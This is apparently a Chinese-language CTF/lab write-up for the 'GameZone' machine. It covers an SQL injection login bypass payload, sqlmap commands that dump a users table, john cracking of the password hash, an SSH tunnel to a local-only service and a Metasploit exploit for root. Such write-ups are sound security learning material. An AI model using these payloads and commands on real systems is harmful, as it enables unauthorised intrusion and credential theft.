SugarCrash!

记录学习,想找个师傅带带我

0%

GameZone

发表于 分类于 Valine:

学习入侵这台机器。了解如何使用 SQLMap、破解一些密码、使用反向 SSH 隧道显示服务并将您的权限提升为 root!

Nmap

202205171025827.png

202205171023835.png
考SQL注入
试下万能密码登录
' or 1=1 # ' or 1=1 #
202205171023775.png
跳转到这了,说明是有注入的
看下这个框框有无注入
202205171025806.png
sqlmap一把梭

sqlmap

抓包,把注入的参数加个*
sqlmap -r 123.txt --dbs --batch
202205171034059.png

1
2
3
4
sqlmap -r 123.txt -D db --tables --batch
sqlmap -r 123.txt -D db -T users --columns --batch
sqlmap -r 123.txt -D db -T users -C username,pwd --dump

202205171038148.png
hash加密的
hash-identifier 工具找出数据库中使用的哈希类型:
202205171040207.png
保存txt john破解

1
john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

得到密码videogamer124
linux 的机器,ssh尝试连接
202205171043268.png

反向ssh隧道公开服务

反向 SSH 端口转发指定将远程服务器主机上的给定端口转发到本地端的给定主机和端口。
202205171055603.png

似乎端口 10000 正在侦听传入连接,尽管它只能从 localhost 进行通信。

设置一个 SSH 隧道,将所有连接到 Kali 主机的 10000 端口重定向到目标主机的 10000 端口:

1
ssh -f -N -L 10000:localhost:10000 agent47@10.10.140.62

202205171056608.png
可以访问到一个新的公开网络服务器
用先前的账密登录
202205171056631.png
找exp
202205171059701.png
msf自带,设置参数开打
202205171104843.png